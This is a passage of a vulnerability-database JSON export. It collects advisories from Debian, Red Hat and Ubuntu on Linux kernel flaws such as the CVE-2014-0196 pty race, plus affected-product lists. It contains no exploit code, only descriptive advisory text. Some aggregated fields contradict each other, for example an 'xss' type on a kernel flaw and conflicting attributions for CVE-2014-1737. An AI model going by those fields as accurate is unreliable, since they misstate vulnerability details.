        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2012-06-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "date": "2012-01-31T06:49:21",
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "date": "2012-01-30T12:12:00",
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "date": "2011-11-09T18:56:12",
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "date": "2011-09-21T14:30:14",
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "date": "2011-09-14T05:16:17",
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "date": "2011-05-25T14:08:37",
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "date": "2012-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      },
      {
        "date": "2012-06-21T23:55:00",
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2016-06-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "date": "2012-02-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "date": "2012-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      },
      {
        "date": "2015-05-06T01:59:00",
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  sco_sock_getsockopt_old Vulnerabilities that capture important information in functions",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.7
  }
}

var-201405-0243
Vulnerability from variot

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings. The Linux kernel is prone to a memory-corruption vulnerability. Local attackers can exploit this issue to execute arbitrary code in contexts of the application or corrupt the kernel memory. Failed exploit attempts can result in a denial-of-service condition. Linux kernel 3.0 through versions 3.14.3 are vulnerable. This BID is being retired as a duplicate of BID 67199. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability is caused by the program not properly managing the access rights of the tty driver.

CVE-2014-2851

Incorrect reference counting in the ping_init_sock() function allows
denial of service or privilege escalation.

For the stable distribution (wheezy), these problems have been fixed in version 3.2.57-3+deb7u1. This update also fixes a regression in the isci driver and suspend problems with certain AMD CPUs (introduced in the updated kernel from the Wheezy 7.5 point release).

For the unstable distribution (sid), these problems will be fixed soon. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel-rt security update Advisory ID: RHSA-2014:0557-01 Product: Red Hat Enterprise MRG for RHEL-6 Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0557.html Issue date: 2014-05-27 CVE Names: CVE-2014-0100 CVE-2014-0196 CVE-2014-1737 CVE-2014-1738 CVE-2014-2672 CVE-2014-2678 CVE-2014-2706 CVE-2014-2851 CVE-2014-3122 =====================================================================

  1. Summary:

Updated kernel-rt packages that fix multiple security issues are now available for Red Hat Enterprise MRG 2.5.

The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

  1. Relevant releases/architectures:

MRG Realtime for RHEL 6 Server v.2 - noarch, x86_64

  1. A race condition leading to a use-after-free flaw was found in the way the Linux kernel's TCP/IP protocol suite implementation handled the addition of fragments to the LRU (Last-Recently Used) list under certain conditions. A remote attacker could use this flaw to crash the system or, potentially, escalate their privileges on the system by sending a large amount of specially crafted fragmented packets to that system. (CVE-2014-0100, Important)

  2. A race condition flaw, leading to heap-based buffer overflows, was found in the way the Linux kernel's N_TTY line discipline (LDISC) implementation handled concurrent processing of echo output and TTY write operations originating from user space when the underlying TTY driver was PTY. An unprivileged, local user could use this flaw to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-0196, Important)

  3. A flaw was found in the way the Linux kernel's floppy driver handled user space provided data in certain error code paths while processing FDRAWCMD IOCTL commands. (CVE-2014-1737, Important)

  4. It was found that the Linux kernel's floppy driver leaked internal kernel memory addresses to user space during the processing of the FDRAWCMD IOCTL command. A local user with write access to /dev/fdX could use this flaw to obtain information about the kernel heap arrangement. (CVE-2014-1738, Low)

Note: A local user with write access to /dev/fdX could use these two flaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate their privileges on the system.

  • A use-after-free flaw was found in the way the ping_init_sock() function of the Linux kernel handled the group_info reference counter. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-2851, Important)

  • It was found that a remote attacker could use a race condition flaw in the ath_tx_aggr_sleep() function to crash the system by creating large network traffic on the system's Atheros 9k wireless network adapter. (CVE-2014-2672, Moderate)

  • A NULL pointer dereference flaw was found in the rds_iw_laddr_check() function in the Linux kernel's implementation of Reliable Datagram Sockets (RDS). A local, unprivileged user could use this flaw to crash the system. (CVE-2014-2678, Moderate)

  • A race condition flaw was found in the way the Linux kernel's mac80211 subsystem implementation handled synchronization between TX and STA wake-up code paths. A remote attacker could use this flaw to crash the system. (CVE-2014-2706, Moderate)

  • It was found that the try_to_unmap_cluster() function in the Linux kernel's Memory Managment subsystem did not properly handle page locking in certain cases, which could potentially trigger the BUG_ON() macro in the mlock_vma_page() function. A local, unprivileged user could use this flaw to crash the system. (CVE-2014-3122, Moderate)

Red Hat would like to thank Matthew Daley for reporting CVE-2014-1737 and CVE-2014-1738. The CVE-2014-0100 issue was discovered by Nikolay Aleksandrov of Red Hat.

Users are advised to upgrade to these updated packages, which upgrade the kernel-rt kernel to version kernel-rt-3.10.33-rt32.34 and correct these issues. The system must be rebooted for this update to take effect.

  1. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1070618 - CVE-2014-0100 kernel: net: inet frag code race condition leading to user-after-free 1083246 - CVE-2014-2672 kernel: ath9k: tid->sched race in ath_tx_aggr_sleep() 1083274 - CVE-2014-2678 kernel: net: rds: dereference of a NULL device in rds_iw_laddr_check() 1083512 - CVE-2014-2706 Kernel: net: mac80211: crash dues to AP powersave TX vs. wakeup race 1086730 - CVE-2014-2851 kernel: net: ping: refcount issue in ping_init_sock() function 1093076 - CVE-2014-3122 Kernel: mm: try_to_unmap_cluster() should lock_page() before mlocking 1094232 - CVE-2014-0196 kernel: pty layer race condition leading to memory corruption 1094299 - CVE-2014-1737 CVE-2014-1738 kernel: block: floppy: privilege escalation via FDRAWCMD floppy ioctl command

  1. Package List:

MRG Realtime for RHEL 6 Server v.2:

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/RHEMRG-RHEL6/SRPMS/kernel-rt-3.10.33-rt32.34.el6rt.src.rpm

noarch: kernel-rt-doc-3.10.33-rt32.34.el6rt.noarch.rpm kernel-rt-firmware-3.10.33-rt32.34.el6rt.noarch.rpm

x86_64: kernel-rt-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-debug-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-debug-debuginfo-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-debug-devel-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-debuginfo-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-debuginfo-common-x86_64-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-devel-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-trace-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-trace-debuginfo-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-trace-devel-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-vanilla-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-vanilla-debuginfo-3.10.33-rt32.34.el6rt.x86_64.rpm kernel-rt-vanilla-devel-3.10.33-rt32.34.el6rt.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. References:

https://www.redhat.com/security/data/cve/CVE-2014-0100.html https://www.redhat.com/security/data/cve/CVE-2014-0196.html https://www.redhat.com/security/data/cve/CVE-2014-1737.html https://www.redhat.com/security/data/cve/CVE-2014-1738.html https://www.redhat.com/security/data/cve/CVE-2014-2672.html https://www.redhat.com/security/data/cve/CVE-2014-2678.html https://www.redhat.com/security/data/cve/CVE-2014-2706.html https://www.redhat.com/security/data/cve/CVE-2014-2851.html https://www.redhat.com/security/data/cve/CVE-2014-3122.html https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFThL2GXlSAg2UNWIIRAnKNAKC8L7AEZsVfN3SDIRby/ZWJeNGsfACePcvG f8gO1I7yuxLQ1jWWp5abYcQ= =WQJC -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 6.2) - x86_64

This update also fixes the following bug:

  • Prior to this update, a guest-provided value was used as the head length of the socket buffer allocated on the host. If the host was under heavy memory load and the guest-provided value was too large, the allocation could have failed, resulting in stalls and packet drops in the guest's Tx path. With this update, the guest-provided value has been limited to a reasonable size so that socket buffer allocations on the host succeed regardless of the memory load on the host, and guests can send packets without experiencing packet drops or stalls. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

  1. 7):

Source: kernel-3.10.0-123.1.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-123.1.2.el7.noarch.rpm

x86_64: kernel-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm kernel-devel-3.10.0-123.1.2.el7.x86_64.rpm kernel-headers-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.1.2.el7.x86_64.rpm perf-3.10.0-123.1.2.el7.x86_64.rpm perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

Source: kernel-3.10.0-123.1.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-123.1.2.el7.noarch.rpm

x86_64: kernel-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm kernel-devel-3.10.0-123.1.2.el7.x86_64.rpm kernel-headers-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.1.2.el7.x86_64.rpm perf-3.10.0-123.1.2.el7.x86_64.rpm perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch: kernel-doc-3.10.0-123.1.2.el7.noarch.rpm

x86_64: kernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.1.2.el7.x86_64.rpm perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm python-perf-3.10.0-123.1.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

noarch: kernel-doc-3.10.0-123.1.2.el7.noarch.rpm

ppc64: kernel-debug-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-123.1.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-123.1.2.el7.ppc64.rpm perf-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm python-perf-3.10.0-123.1.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm

s390x: kernel-debug-debuginfo-3.10.0-123.1.2.el7.s390x.rpm kernel-debuginfo-3.10.0-123.1.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-123.1.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-123.1.2.el7.s390x.rpm perf-debuginfo-3.10.0-123.1.2.el7.s390x.rpm python-perf-3.10.0-123.1.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-123.1.2.el7.s390x.rpm

x86_64: kernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.1.2.el7.x86_64.rpm perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm python-perf-3.10.0-123.1.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-123.1.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-123.1.2.el7.noarch.rpm

x86_64: kernel-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm kernel-devel-3.10.0-123.1.2.el7.x86_64.rpm kernel-headers-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.1.2.el7.x86_64.rpm perf-3.10.0-123.1.2.el7.x86_64.rpm perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. ============================================================================ Ubuntu Security Notice USN-2260-1 June 27, 2014

linux-lts-trusty vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 LTS

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux-lts-trusty: Block storage devices (udeb)

Details:

A flaw was discovered in the Linux kernel's pseudo tty (pty) device. (CVE-2014-0196)

Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. (CVE-2014-1737)

A flaw was discovered in the handling of network packets when mergeable buffers are disabled for virtual machines in the Linux kernel. Guest OS users may exploit this flaw to cause a denial of service (host OS crash) or possibly gain privilege on the host OS. (CVE-2014-2568)

A flaw was discovered in the Linux kernel's ping sockets. (CVE-2014-2851)

Sasha Levin reported a bug in the Linux kernel's virtual memory management subsystem. (CVE-2014-3122)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 LTS: linux-image-3.13.0-30-generic 3.13.0-30.54~precise2 linux-image-3.13.0-30-generic-lpae 3.13.0-30.54~precise2

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201405-0243",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "enterprise manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "3.1.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "big-iq security",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "enterprise manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "3.1.1"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.20"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "10.04"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "kernel",
        "scope": "gt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-iq cloud",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.3"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "13.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2.59"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "big-iq device",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.10.40"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-iq security",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-iq cloud",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.4.91"
      },
      {
        "model": "big-iq cloud and orchestration",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "1.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "linux enterprise high availability extension",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-iq application delivery controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "big-iq device",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.2.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.10"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.6.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.0.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.2.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.0.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
